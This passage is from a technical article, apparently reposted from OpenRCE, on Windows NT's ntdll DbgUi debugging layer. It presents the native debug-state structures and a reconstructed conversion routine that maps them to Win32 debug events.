StateInfo; } DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE; The fields should be pretty self-explanatory, so let's look at the DBG_STATE enumeration: //// Debug States // typedef enum _DBG_STATE { DbgIdle, DbgReplyPending, DbgCreateThreadStateChange, DbgCreateProcessStateChange, DbgExitThreadStateChange, DbgExitProcessStateChange, DbgExceptionStateChange, DbgBreakpointStateChange, DbgSingleStepStateChange, DbgLoadDllStateChange, DbgUnloadDllStateChange } DBG_STATE, *PDBG_STATE; If you take a look at the Win32 DEBUG_EVENT structure and associated debug event types, you'll notice some differences which might be useful to you. For starters, Exceptions, Breakpoints and Single Step exceptions are handled differently. In the Win32 world, only two distinctions are made: RIP_EVENT for exceptions, and EXCEPTION_DEBUG_EVENT for a debug event. Although code can later figure out if this was a breakpoint or single step, this information comes directly in the native structure. You will also notice that OUTPUT_DEBUG_STRING event is missing. Here, it's DbgUi that's at a disadvantage, since the information is sent as an Exception, and post-processing is required (which we'll take a look at soon). There are also two more states that Win32 does not support, which is the Idle state and the Reply Pending state. These don't offer much information from the point of view of a debugger, so they are ignored. Now let's take a look at the actual structures seen in the unions: //// Debug Message Structures // typedef struct _DBGKM_EXCEPTION { EXCEPTION_RECORD ExceptionRecord; ULONG FirstChance; } DBGKM_EXCEPTION, *PDBGKM_EXCEPTION; typedef struct _DBGKM_CREATE_THREAD { ULONG SubSystemKey; PVOID StartAddress; } DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD; typedef struct _DBGKM_CREATE_PROCESS { ULONG SubSystemKey; HANDLE FileHandle; PVOID BaseOfImage; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; DBGKM_CREATE_THREAD InitialThread; } DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS; typedef struct _DBGKM_EXIT_THREAD { NTSTATUS ExitStatus; } DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD; typedef struct _DBGKM_EXIT_PROCESS { NTSTATUS ExitStatus; } DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS; typedef struct _DBGKM_LOAD_DLL { HANDLE FileHandle; PVOID BaseOfDll; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; PVOID NamePointer; } DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL; typedef struct _DBGKM_UNLOAD_DLL { PVOID BaseAddress; } DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL; If you're familiar with the DEBUG_EVENT structure, you should notice some subtle differences. First of all, no indication of the process name, which explains why MSDN documents this field being optional and not used by Win32. You will also notice the lack of a pointer to the TEB in the thread structure. Finally, unlike new processes, Win32 does display the name of any new DLL loaded, but this also seems to be missing in the Load DLL structure; we'll see how this and other changes are dealt with soon. As far as extra information goes however, we have the "SubsystemKey" field. Because NT was designed to support multiple subsystems, this field is critical to identifying from which subsystem the new thread or process was created from. Windows 2003 SP1 adds support for debugging POSIX applications, and while I haven't looked at the POSIX debug APIs, I'm convinced they're built around the DbgUi implementation, and that this field is used differently by the POSIX library (much like Win32 ignores it). Now that we've seen the differences, the final API to look at is DbgUiConvertStateChangeStructure, which is responsible for doing these modifications and fixups: NTSTATUSNTAPI DbgUiConvertStateChangeStructure(IN PDBGUI_WAIT_STATE_CHANGE WaitStateChange, OUT PVOID Win32DebugEvent) { NTSTATUS Status; OBJECT_ATTRIBUTES ObjectAttributes; THREAD_BASIC_INFORMATION ThreadBasicInfo; LPDEBUG_EVENT DebugEvent = Win32DebugEvent; HANDLE ThreadHandle; /* Write common data */ DebugEvent->dwProcessId = (DWORD)WaitStateChange-> AppClientId.UniqueProcess; DebugEvent->dwThreadId = (DWORD)WaitStateChange->AppClientId.UniqueThread; /* Check what kind of even this is */ switch (WaitStateChange->NewState) { /* New thread */ case DbgCreateThreadStateChange: /* Setup Win32 code */ DebugEvent->dwDebugEventCode = CREATE_THREAD_DEBUG_EVENT; /* Copy data over */ DebugEvent->u.CreateThread.hThread = WaitStateChange->StateInfo.CreateThread.HandleToThread; DebugEvent->u.CreateThread.lpStartAddress = WaitStateChange->StateInfo.CreateThread.NewThread.StartAddress; /* Query the TEB */ Status = NtQueryInformationThread(WaitStateChange->StateInfo. CreateThread.HandleToThread, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); if (!NT_SUCCESS(Status)) { /* Failed to get PEB address */ DebugEvent->u.CreateThread.lpThreadLocalBase = NULL; } else { /* Write PEB Address */ DebugEvent->u.CreateThread.lpThreadLocalBase = ThreadBasicInfo.TebBaseAddress; } break; /* New process */ case DbgCreateProcessStateChange: /* Write Win32 debug code */ DebugEvent->dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT; /* Copy data over */ DebugEvent->u.CreateProcessInfo.hProcess = WaitStateChange->StateInfo.CreateProcessInfo.HandleToProcess; DebugEvent->u.CreateProcessInfo.hThread = WaitStateChange->StateInfo.CreateProcessInfo.HandleToThread; DebugEvent->u.CreateProcessInfo.hFile = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. FileHandle; DebugEvent->u.CreateProcessInfo.lpBaseOfImage = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. BaseOfImage; DebugEvent->u.CreateProcessInfo.dwDebugInfoFileOffset = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. DebugInfoFileOffset; DebugEvent->u.CreateProcessInfo.nDebugInfoSize = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. DebugInfoSize; DebugEvent->u.CreateProcessInfo.lpStartAddress = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. InitialThread.StartAddress; /* Query TEB address */ Status = NtQueryInformationThread(WaitStateChange->StateInfo. CreateProcessInfo.HandleToThread, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); if (!NT_SUCCESS(Status)) { /* Failed to get PEB address */ DebugEvent->u.CreateThread.lpThreadLocalBase = NULL; } else { /* Write PEB Address */ DebugEvent->u.CreateThread.lpThreadLocalBase = ThreadBasicInfo.TebBaseAddress; } /* Clear image name */ DebugEvent->u.CreateProcessInfo.lpImageName = NULL; DebugEvent->u.CreateProcessInfo.fUnicode = TRUE; break; /* Thread exited */ case DbgExitThreadStateChange: /* Write the Win32 debug code and the exit status */ DebugEvent->dwDebugEventCode = EXIT_THREAD_DEBUG_EVENT; DebugEvent->u.ExitThread.dwExitCode = WaitStateChange->StateInfo.ExitThread.ExitStatus; break; /* Process exited */ case DbgExitProcessStateChange: /* Write the Win32 debug code and the exit status */ DebugEvent->dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT; DebugEvent->u.ExitProcess.dwExitCode = WaitStateChange->StateInfo.ExitProcess.ExitStatus; break; /* Any sort of exception */ case DbgExceptionStateChange: case DbgBreakpointStateChange: case DbgSingleStepStateChange: /* Check if this was a debug print */ if (WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionCode == DBG_PRINTEXCEPTION_C) { /* Set the Win32 code */ DebugEvent->dwDebugEventCode = OUTPUT_DEBUG_STRING_EVENT; /* Copy debug string information */ DebugEvent->u.DebugString.lpDebugStringData = (PVOID)WaitStateChange-> StateInfo.Exception.ExceptionRecord. ExceptionInformation[1]; DebugEvent->u.DebugString.nDebugStringLength = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[0]; DebugEvent->u.DebugString.fUnicode = FALSE; } else if (WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionCode == DBG_RIPEXCEPTION) { /* Set the Win32 code */ DebugEvent->dwDebugEventCode = RIP_EVENT; /* Set exception information */ DebugEvent->u.RipInfo.dwType = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[1]; DebugEvent->u.RipInfo.dwError = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[0]; } else { /* Otherwise, this is a debug event, copy info over */ DebugEvent->dwDebugEventCode = EXCEPTION_DEBUG_EVENT; DebugEvent->u.Exception.ExceptionRecord = WaitStateChange->StateInfo.Exception.ExceptionRecord; DebugEvent->u.Exception.dwFirstChance = WaitStateChange->StateInfo.Exception.FirstChance; } break; /* DLL Load */ case DbgLoadDllStateChange : /* Set the Win32 debug code */ DebugEvent->dwDebugEventCode = LOAD_DLL_DEBUG_EVENT; /* Copy the rest of the data */ DebugEvent->u.LoadDll.lpBaseOfDll = WaitStateChange->StateInfo.LoadDll.BaseOfDll; DebugEvent->u.LoadDll.hFile = WaitStateChange->StateInfo.LoadDll.FileHandle; DebugEvent->u.LoadDll.dwDebugInfoFileOffset = WaitStateChange->StateInfo.LoadDll.DebugInfoFileOffset; DebugEvent->u.LoadDll.nDebugInfoSize = WaitStateChange->StateInfo.LoadDll.DebugInfoSize; /* Open the thread */ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); Status = NtOpenThread(&ThreadHandle, THREAD_QUERY_INFORMATION, &ObjectAttributes, &WaitStateChange->AppClientId); if (NT_SUCCESS(Status)) { /* Query thread information */ Status = NtQueryInformationThread(ThreadHandle, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); NtClose(ThreadHandle); } /* Check if we got thread information */ if (NT_SUCCESS(Status)) { /* Save the image name from the TIB */ DebugEvent->u.LoadDll.lpImageName = &((PTEB)ThreadBasicInfo.TebBaseAddress)-> Tib.ArbitraryUserPointer; } else { /* Otherwise, no name */ DebugEvent->u.LoadDll.lpImageName = NULL; } /* It's Unicode */ DebugEvent->u.LoadDll.fUnicode = TRUE; break; /* DLL Unload */ case DbgUnloadDllStateChange: /* Set Win32 code and DLL Base */ DebugEvent->dwDebugEventCode = UNLOAD_DLL_DEBUG_EVENT; DebugEvent->u.UnloadDll.lpBaseOfDll = WaitStateChange->StateInfo.UnloadDll.BaseAddress; break; /* Anything else, fail */ default: return STATUS_UNSUCCESSFUL; } /* Return success */ return STATUS_SUCCESS; } Let's take a look at the interesting fixups. First of all, the lack of a TEB pointer is easily fixed by calling NtQueryInformationThread with the ThreadBasicInformation type, which returns, among other things, a pointer to the TEB, which is then saved in the Win32 structure. As for Debug Strings, the API analyzes the exception code and looks for DBG_PRINTEXCEPTION_C, which has a specific exception record that is parsed and converted into a debug string output. So far so good, but perhaps the nastiest hack is present in the code for DLL loading. Because a loaded DLL doesn't have a structure like EPROCESS or ETHREAD in kernel memory, but in ntdll's private Ldr structures, the only thing that identifies it is a Section Object in memory for its memory mapped file. When the kernel gets a request to create a section for an executable memory mapped file, it saves the name of the file in a field inside the TEB (or TIB, rather) called ArbitraryUserPointer. This function then knows that a string is located there, and sets it as the pointer for the debug event's lpImageName member. This hack has been in NT every since the first builds, and as far as I know, it's still there in Vista. Could it be that hard to solve? Once again, we come to an end in our discussion, since there isn't much left in ntdll that deals with the Debug Object. Here's an overview of what was discussed in this part of the series: DbgUi provides a level of separation between the kernel and Win32 or other subsystems. It's written as a fully independent class, even having accessor and mutator methods instead of exposing its handles. The handle to a thread's Debug Object is stored in the second field of the DbgSsReserved array in the TEB. DbgUi allows a thread to have a single DebugObject, but using the native system calls allows you to do as many as you want. Most DbgUi APIs are simple wrappers around the NtXxxDebugObject system calls, and use the TEB handle to communicate. DbgUi is responsible for breaking into the attached process, not the kernel. DbgUi uses its own structure for debug events, which the kernel understands. In some ways, this structure provides more information about some events (such as the subsystem and whether this was a single step or a breakpoint exception), but in others, some information is missing (such as a pointer to the thread's TEB or a separate debug string structure). The TIB (located inside the TEB)'s ArbitraryPointer member contains the name of the loaded DLL during a Debug Event. Sursa: OpenRCE
×
×
  • Create New...